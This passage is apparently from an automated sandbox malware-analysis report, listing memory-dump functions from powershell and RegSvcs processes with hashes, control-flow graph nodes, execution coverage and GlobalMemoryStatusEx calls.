                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411985142.00007FFD34290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34290000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd34290000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ab1f67435e8f5b97f2aa587b3eb317651c2ac42f5f5df5a34778a9413f0b867
                                    • Instruction ID: 227eeaf7683453dfdea988357352e5b2601b70c3c1d38f787d9c6c4847afde88
                                    • Opcode Fuzzy Hash: 2ab1f67435e8f5b97f2aa587b3eb317651c2ac42f5f5df5a34778a9413f0b867
                                    • Instruction Fuzzy Hash: E7514232B0DA8A4FF7959A6944B42747BE1FF5A310B1900FBD50DD7193EA2EEC119380
                                    Function 00007FFD341C6392 Relevance: .1, Instructions: 64COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0872e01e53b03bfead0ea878561527ce98ccfb450391a0442142b1c308257661
                                    • Instruction ID: d082b42f0e483a6cf653019b5aceed57b7facaf5fa38a0eb93fd3b0f1d80865d
                                    • Opcode Fuzzy Hash: 0872e01e53b03bfead0ea878561527ce98ccfb450391a0442142b1c308257661
                                    • Instruction Fuzzy Hash: BC01B53275C6054FA30C992CAE92175B387D7CA721760913ED14AC62EADC39E8034585
                                    Function 00007FFD341C584A Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1a6cbafb7fe53425e6b533500b3db898849c1947c3235c8abc0d531c9d497d8c
                                    • Instruction ID: 4b068cd3de4dda516cd9ba5bebae50774d4ff1259f0de89b4b0d4a0ea40fd6d5
                                    • Opcode Fuzzy Hash: 1a6cbafb7fe53425e6b533500b3db898849c1947c3235c8abc0d531c9d497d8c
                                    • Instruction Fuzzy Hash: ED11EB72A1CF854FE348DB2849A5439BBE1FF56300B1059BED58AC719BCD39A801AB42
                                    Function 00007FFD341C58B9 Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c3d6dc51122fad631e80b3aa25bf8f2d0340a8b643c0dd6e03f037c8522b111
                                    • Instruction ID: bddcbba941f9c2dee1f7a36dc88d57a5b21511b2e5e357ea3d3d49c4d9a2002f
                                    • Opcode Fuzzy Hash: 2c3d6dc51122fad631e80b3aa25bf8f2d0340a8b643c0dd6e03f037c8522b111
                                    • Instruction Fuzzy Hash: D511CA72B2CF850FE748EB2849A5579B7E1FF96200B10197EE08AC7197CD28AC01A702
                                    Function 00007FFD341C37B5 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction ID: fc323f2b088de610f599b300ca66939c6fa562b4a632d069c87b4287cc784aa7
                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction Fuzzy Hash: 6B01677125CB0D4FD744EF0CE491AA6B7E0FB95364F10056DE58AC3651D636E882CB45
                                    Function 00007FFD341C7558 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61aab0de55117d167e387e4d8712d1f4f61e973bca4c2d1eeb1fadd2d37d1f5b
                                    • Instruction ID: b9e9289ccc9531a9c8b77c8e2f4f27e0c4195abb51f5b6aabe110add8666c087
                                    • Opcode Fuzzy Hash: 61aab0de55117d167e387e4d8712d1f4f61e973bca4c2d1eeb1fadd2d37d1f5b
                                    • Instruction Fuzzy Hash: 53F0E973718A0A8BD708EA28C99157973D6FB85344B10853EE44BC6292DE3CE8428641
                                    Function 00007FFD341C764D Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b63a17613478e9cf55d18562190b18aa353de1de4042bed13c2e0a2c5fe27268
                                    • Instruction ID: f0cfdb265226b559f842b99bcf3a99ee5ed25396d95e25801ded4b5b6f4abf6a
                                    • Opcode Fuzzy Hash: b63a17613478e9cf55d18562190b18aa353de1de4042bed13c2e0a2c5fe27268
                                    • Instruction Fuzzy Hash: A4F08232B0862B4FD71DEE2C86A44663256E796310720C27DC583CB2A6DD78ED46D6C4
                                    Function 00007FFD341C4CD1 Relevance: .0, Instructions: 25COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f35d138edf8207725729d674ef0b0ffa253a7c344e8960fe44db078e8a4e1149
                                    • Instruction ID: 3db63702511d6f918e4ec7fd5e5a6043fbd99956af95a54c02de8d84447b9256
                                    • Opcode Fuzzy Hash: f35d138edf8207725729d674ef0b0ffa253a7c344e8960fe44db078e8a4e1149
                                    • Instruction Fuzzy Hash: 59F0DA76E1860B8FDB00DFA4C9916EEB7F0FB55310F108A25D116EB254D638AA40AF94
                                    Function 00007FFD341C64A3 Relevance: .0, Instructions: 19COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82928d3cd9f4d0fbc077ca32e1b7b8a5a7cb462101be63e0cf54c24a9b60690a
                                    • Instruction ID: 76b6cf6e6eefa9c7091b54666d2ca52a2c9f664dfd74b657ea40cc90f7e22362
                                    • Opcode Fuzzy Hash: 82928d3cd9f4d0fbc077ca32e1b7b8a5a7cb462101be63e0cf54c24a9b60690a
                                    • Instruction Fuzzy Hash: B6E02B3171DB4887821CDE2D8661035B6DAEBE2504764673FE18EC26D5CE34A802D747
                                    Function 00007FFD341C652E Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6c404594c7be63b4a9fed95c33eee0bf6dbaf757a14679e2bfa8a276c4678b73
                                    • Instruction ID: 85c835ad3c18d4ffb4164f062664310590a9ddd097f531b8aa5ccdeb317b2785
                                    • Opcode Fuzzy Hash: 6c404594c7be63b4a9fed95c33eee0bf6dbaf757a14679e2bfa8a276c4678b73
                                    • Instruction Fuzzy Hash: B1D05B3171DF0947521C952986A2035F2C6DBD6505750573DD10AC15D5CD286C43D446
                                    Function 00007FFD341C6478 Relevance: .0, Instructions: 12COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ea91606b25d83f533b00a77c8deb06ee6b38cf7798083b04795c64f98aae7878
                                    • Instruction ID: e1bb3b5694916c4b73c728086aee996725f7b6ed9d021c017c00cefab55df3dc
                                    • Opcode Fuzzy Hash: ea91606b25d83f533b00a77c8deb06ee6b38cf7798083b04795c64f98aae7878
                                    • Instruction Fuzzy Hash: 76D0A736A2D14186911DC514CFB1039B5855B86604720613ED14FC2554892C2C036481

                                    Non-executed Functions

                                    Function 00007FFD341C40FA Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4
                                    • API String ID: 0-4088798008
                                    • Opcode ID: 63c74d295f73335d3fafb76eecc2354eb34ffa48b5781ae67b7531bfe18af16e
                                    • Instruction ID: 8718a04323d18d175887ec0d0d41fef82c2a7e251a3a9d52a165ce722b4494c7
                                    • Opcode Fuzzy Hash: 63c74d295f73335d3fafb76eecc2354eb34ffa48b5781ae67b7531bfe18af16e
                                    • Instruction Fuzzy Hash: 5491605BE0DBD25BE66286286DF60D57FE0EF5326470900B7C6D6CA093AA0D6C07B352
                                    Function 00007FFD341CA9A9 Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e5866d076c6e86b328a2c3b42c77598803159423073af89eada624ce188ef96
                                    • Instruction ID: 6f0fb45e52ec66bd2ffb69e324259ac1229c65ed810d464487c382089eb1ee15
                                    • Opcode Fuzzy Hash: 8e5866d076c6e86b328a2c3b42c77598803159423073af89eada624ce188ef96
                                    • Instruction Fuzzy Hash: 8431233360D7884FE71A8A749C665A2BBA0EB5326070601EFD586CB0A3D91DAC07D792
                                    Function 00007FFD341CA9E9 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2411623965.00007FFD341C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd341c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08fdb461ab8150a906fb6179aede27b1d0028e372aa63dd294d3cb5b27f8ff43
                                    • Instruction ID: 9277f00ae52b6d988a8225b32666cd1d692c5714250c4b05c3fc7142e444670e
                                    • Opcode Fuzzy Hash: 08fdb461ab8150a906fb6179aede27b1d0028e372aa63dd294d3cb5b27f8ff43
                                    • Instruction Fuzzy Hash: 95012B7660C15C1BA32C9D758C8B463F789E387354B02423DE546C3191DE28AD13A681

                                    Execution Graph

                                    Execution Coverage:11.9%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:48
                                    Total number of Limit Nodes:11
                                    execution_graph 19101 1527760 19103 1527766 19101->19103 19102 1527811 19103->19102 19106 1527b81 19103->19106 19111 1527a18 19103->19111 19108 1527b3a 19106->19108 19107 1527c1e 19107->19103 19108->19107 19116 1528140 19108->19116 19120 152813e 19108->19120 19113 1527a52 19111->19113 19112 1527c1e 19112->19103 19113->19112 19114 1528140 3 API calls 19113->19114 19115 152813e 3 API calls 19113->19115 19114->19113 19115->19113 19118 1528166 19116->19118 19117 15283b5 19118->19117 19124 15291b0 19118->19124 19121 1528140 19120->19121 19122 15283b5 19121->19122 19123 15291b0 3 API calls 19121->19123 19122->19122 19123->19121 19128 152e8a8 19124->19128 19132 152e86f 19124->19132 19125 15291b6 19129 152e8a9 19128->19129 19130 152eaed 19129->19130 19136 152ee30 19129->19136 19130->19125 19133 152e87d 19132->19133 19134 152eaed 19133->19134 19135 152ee30 3 API calls 19133->19135 19134->19125 19135->19133 19137 152ee3c 19136->19137 19141 152ee93 19137->19141 19150 152ee98 19137->19150 19138 152ee6e 19138->19129 19142 152ee98 19141->19142 19143 152eea5 19142->19143 19158 152e5f8 19142->19158 19143->19138 19145 152eeee 19145->19138 19147 152ef53 19147->19138 19148 152efb6 GlobalMemoryStatusEx 19149 152efe6 19148->19149 19149->19138 19151 152eea5 19150->19151 19152 152eecd 19150->19152 19151->19138 19153 152e5f8 GlobalMemoryStatusEx 19152->19153 19155 152eeea 19153->19155 19154 152eeee 19154->19138 19155->19154 19156 152efb6 GlobalMemoryStatusEx 19155->19156 19157 152efe6 19156->19157 19157->19138 19159 152ef70 GlobalMemoryStatusEx 19158->19159 19161 152eeea 19159->19161 19161->19145 19161->19147 19161->19148

                                    Executed Functions

                                    Function 05B770E0 Relevance: 3.0, Strings: 2, Instructions: 536COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 5b770e0-5b77105 call 5b78c08 1 5b7710b-5b77134 0->1 4 5b77139-5b7714e 1->4 5 5b77154 4->5 6 5b775c0-5b775eb 4->6 7 5b774ac-5b774cd 5->7 11 5b775f1-5b77607 6->11 12 5b7789c-5b778bd 6->12 15 5b774e5-5b774ef 7->15 16 5b774cf-5b774e3 7->16 18 5b7760e 11->18 22 5b778d5-5b778df 12->22 23 5b778bf-5b778d3 12->23 19 5b774f9-5b774ff 15->19 16->19 21 5b77613-5b77622 18->21 19->4 24 5b77674-5b776a0 21->24 25 5b77624 21->25 26 5b778e9 22->26 23->26 34 5b776a6-5b776cd 24->34 35 5b789df-5b78a19 24->35 25->18 25->24 27 5b77642-5b77657 25->27 28 5b7762b-5b77640 25->28 31 5b77a2b-5b77a56 26->31 27->21 28->21 40 5b77a5c-5b77ad7 31->40 41 5b77b19-5b77b44 31->41 46 5b776d2-5b776e7 34->46 62 5b78a1e-5b78a25 35->62 40->35 68 5b77add-5b77ae0 40->68 53 5b77b46-5b77b52 41->53 54 5b77bc0-5b77beb 41->54 46->31 48 5b776ed 46->48 48->7 48->18 48->24 48->27 48->28 51 5b77731-5b77759 48->51 51->46 53->62 65 5b77cb3-5b77cde 54->65 66 5b77bf1-5b77c57 54->66 75 5b77d41-5b77d62 65->75 76 5b77ce0-5b77cec 65->76 85 5b77c62-5b77c86 66->85 73 5b77aec-5b77b10 68->73 73->41 77 5b77b12 73->77 83 5b77d64-5b77d78 75->83 84 5b77d7a-5b77d84 75->84 76->62 77->41 77->73 86 5b77d8e-5b77d94 83->86 84->86 85->65 88 5b77c88 85->88 87 5b77d1f-5b77d34 86->87 89 5b77d3a 87->89 90 5b77f48-5b77f73 87->90 88->65 88->75 88->85 88->90 91 5b77d96-5b77dfe 88->91 92 5b77e55-5b77e76 88->92 93 5b77e95-5b77ed4 88->93 94 5b77d1a 88->94 95 5b77fba 88->95 96 5b77ed9-5b77f1d 88->96 97 5b77e03-5b77e50 88->97 98 5b77f22-5b77f43 88->98 99 5b77fe1-5b7807d 88->99 100 5b77c8f-5b77c99 88->100 89->75 89->90 89->91 89->92 89->93 89->94 89->95 89->96 89->97 89->98 89->99 120 5b7838a-5b783ab 90->120 121 5b77f79-5b77f83 90->121 91->87 122 5b77e85-5b77e8a 92->122 123 5b77e78-5b77e83 92->123 93->62 94->87 101 5b77fbf-5b77fd4 95->101 96->62 97->87 98->87 99->101 100->35 102 5b77c9f-5b77cae 100->102 101->62 105 5b77fda 101->105 102->62 105->95 105->99 146 5b783ad-5b783b8 120->146 147 5b783ba-5b783bf 120->147 128 5b78082-5b7809e 121->128 129 5b77f89-5b77f96 121->129 130 5b77e90 122->130 123->130 150 5b780a1 128->150 129->128 133 5b77f9c-5b77fb4 129->133 130->87 133->95 148 5b783c5 146->148 147->148 152 5b78494-5b7849f 148->152 154 5b780ab-5b780bf 150->154 155 5b780c5 154->155 156 5b781f1-5b781f6 154->156 155->150 155->152 155->156 157 5b781d6-5b781ec 155->157 158 5b78125-5b7817a 155->158 159 5b780f5-5b78123 155->159 160 5b7817f-5b781a6 155->160 161 5b780cc-5b780f3 155->161 162 5b781ab-5b781d1 155->162 156->62 157->154 158->154 159->154 160->154 161->154 162->154
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ykk.$%a
                                    • API String ID: 0-2664548475
                                    • Opcode ID: ef6a2827ba0af3d05f7f1ec55c4503ac3935754bed441ee8cb12ebb0449023d7
                                    • Instruction ID: 57d410def69ca6ec167714e744d0e3e1ad99031690afdcab4b7d782871851a24
                                    • Opcode Fuzzy Hash: ef6a2827ba0af3d05f7f1ec55c4503ac3935754bed441ee8cb12ebb0449023d7
                                    • Instruction Fuzzy Hash: D3324C70B5021ACFDB64DB25D898BAAB773FB85300F1084E9D51AAB394DE31AD81CF51
                                    Function 05B72808 Relevance: .5, Instructions: 511COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0d14cb915ae5fc5bc57717b6da98b9afccd84f40ce8d3f8cf70c63f9f2928d5b
                                    • Instruction ID: c3f1c0177446a6ae8a62e84eace5a3facaea3d71d0a66535866f137eff93dd30
                                    • Opcode Fuzzy Hash: 0d14cb915ae5fc5bc57717b6da98b9afccd84f40ce8d3f8cf70c63f9f2928d5b
                                    • Instruction Fuzzy Hash: 7A127D74A002199FDB14DF69C854AAEBBF6FF88300F1485A9E516EB395DB30ED41CB90
                                    Function 05B72E30 Relevance: .4, Instructions: 446COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d33636926e2d038ecd7d37ba6a5ad4f21d8fd2cdf08392c358614cae3af34a5
                                    • Instruction ID: 5f57d0451d73c92eb2ad2406d43d357bbfc4b8472a809154804c1e260c2833a9
                                    • Opcode Fuzzy Hash: 2d33636926e2d038ecd7d37ba6a5ad4f21d8fd2cdf08392c358614cae3af34a5
                                    • Instruction Fuzzy Hash: 81025F70A0411DDFCB14CFA9C884AAEBBF6FF49340F1584A9E825AB261DB31ED41DB51
                                    Function 05B70910 Relevance: .2, Instructions: 201COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: deca3aea4e4b0168cd3542cd6a2bedba3a8a036323480cf51ff65af7bb532ca4
                                    • Instruction ID: 11aad828df758c918d69039a9db2f1fd80c979bb42b9311c5d2e45c07501db45
                                    • Opcode Fuzzy Hash: deca3aea4e4b0168cd3542cd6a2bedba3a8a036323480cf51ff65af7bb532ca4
                                    • Instruction Fuzzy Hash: B6710E71B1410CCFD714EB3CE848A2A77A3FB84314F24859AE8659B398DA74ED468F90
                                    Function 05B709C6 Relevance: .2, Instructions: 186COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3cf38344777018473464971d5b06d6560474e82ce86d03da00553e393bdd1941
                                    • Instruction ID: 0291d01762011ac997a5531c4e15717de7b3e07bcfe01e0cbfb4cffe693a2257
                                    • Opcode Fuzzy Hash: 3cf38344777018473464971d5b06d6560474e82ce86d03da00553e393bdd1941
                                    • Instruction Fuzzy Hash: 8C611171B1410CCFD314EB3CE948A2A77A3FB94318F24859AE865DB394DA74ED458F90
                                    Function 05B706D0 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e6a201072570b4196d72c8cd50f06a5ded4f84fbdd724ce64ce743a60361972
                                    • Instruction ID: 01dc9e367fa8c4d172cec9b21c16c72843fbddffc4d15370a8d706eac9c740cc
                                    • Opcode Fuzzy Hash: 6e6a201072570b4196d72c8cd50f06a5ded4f84fbdd724ce64ce743a60361972
                                    • Instruction Fuzzy Hash: 3A31247171824ECFD704EF69A948126FBA7EBD9200B09C5E7D815CB395C630EC418F95
                                    Function 05B706C0 Relevance: .1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d98bd926b054a41a03b65431bedf3e6851d16cbae3573e4ad6f4a399ac0c68a
                                    • Instruction ID: b7c731bf6bb4218ecb89ef54915158b3f96067f9e7dd4e0f1a66d08f2a0e0fc6
                                    • Opcode Fuzzy Hash: 7d98bd926b054a41a03b65431bedf3e6851d16cbae3573e4ad6f4a399ac0c68a
                                    • Instruction Fuzzy Hash: 36310F71A1814ECFD704EF79A94D126FBA7EBD9210B09C5EBD825CB284C630EC408F91
                                    Function 05B795F2 Relevance: .1, Instructions: 91COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf3b14c0abd4da1f20ffc847c22d04b774edb4a28a7946a8aeec4f55a04cabf4
                                    • Instruction ID: a5c4bae45f3028e8626f5bf959a88b6002f69b11f65166c7e210dfa181e5dd7d
                                    • Opcode Fuzzy Hash: bf3b14c0abd4da1f20ffc847c22d04b774edb4a28a7946a8aeec4f55a04cabf4
                                    • Instruction Fuzzy Hash: 5A318B31B0520ECFD704AB7DAC046AFB9AFAFE1600F44425AD525E73D0CA70DE424B81
                                    Function 0152EE98 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 152ee98-152eea3 182 152eea5-152eecc call 152e5ec 181->182 183 152eecd-152eeec call 152e5f8 181->183 189 152eef2-152eef7 183->189 190 152eeee-152eef1 183->190 191 152eef9-152ef32 189->191 196 152ef34 191->196 197 152ef39-152ef51 191->197 196->191 198 152ef36-152ef38 196->198 201 152ef53-152ef56 197->201 202 152ef57-152ef6a 197->202 198->197 204 152ef71-152efe4 GlobalMemoryStatusEx 202->204 205 152ef6c-152ef70 202->205 208 152efe6-152efec 204->208 209 152efed-152f015 204->209 205->204 208->209
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5de9a2fea70e03d025387e2084a121feaab1cd24b8d184b29775d4ecad979a4f
                                    • Instruction ID: 5dcde0742867ea1ebd7b0eafa1633c42f8148ee3d7546c63acd2ebbb8646f66b
                                    • Opcode Fuzzy Hash: 5de9a2fea70e03d025387e2084a121feaab1cd24b8d184b29775d4ecad979a4f
                                    • Instruction Fuzzy Hash: 44414532D043A68FCB14DFB9C8146AEBBF0FF8A210F1485AAD454EB291DB749845CBD1
                                    Function 0152EF68 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 212 152ef68-152ef6a 213 152ef71-152efae 212->213 214 152ef6c-152ef70 212->214 216 152efb6-152efe4 GlobalMemoryStatusEx 213->216 214->213 217 152efe6-152efec 216->217 218 152efed-152f015 216->218 217->218
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0152EEEA), ref: 0152EFD7
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: f15944e7fda5329d2fc379d0394bf5da5aa02eb7c8e8e6a38c67d8c06a06d010
                                    • Instruction ID: 68944f27ca668e47465b972c39ac8ba48b190813bfc25ae867d34400f8705105
                                    • Opcode Fuzzy Hash: f15944e7fda5329d2fc379d0394bf5da5aa02eb7c8e8e6a38c67d8c06a06d010
                                    • Instruction Fuzzy Hash: 1B2124B2C00269DBDB10CF9AC445BDEFBB4FF49310F15816AD814A7240D378A944CFA5
                                    Function 0152E5F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 221 152e5f8-152efe4 GlobalMemoryStatusEx 225 152efe6-152efec 221->225 226 152efed-152f015 221->226 225->226
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0152EEEA), ref: 0152EFD7
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: 9fb326a5bb95911cc2ca0e5390e30a07764c749479595d80bb37a0b678274383
                                    • Instruction ID: d569a700a9feb5d4171bb9f78db3b040c3bd62669fa73a6648c9d3a46edb9ffb
                                    • Opcode Fuzzy Hash: 9fb326a5bb95911cc2ca0e5390e30a07764c749479595d80bb37a0b678274383
                                    • Instruction Fuzzy Hash: FC1136B2C006599BDB10CF9AC444B9EFBF4FF48210F14812AE914A7240D378A950CFA5
                                    Function 05B74630 Relevance: .6, Instructions: 589COMMON
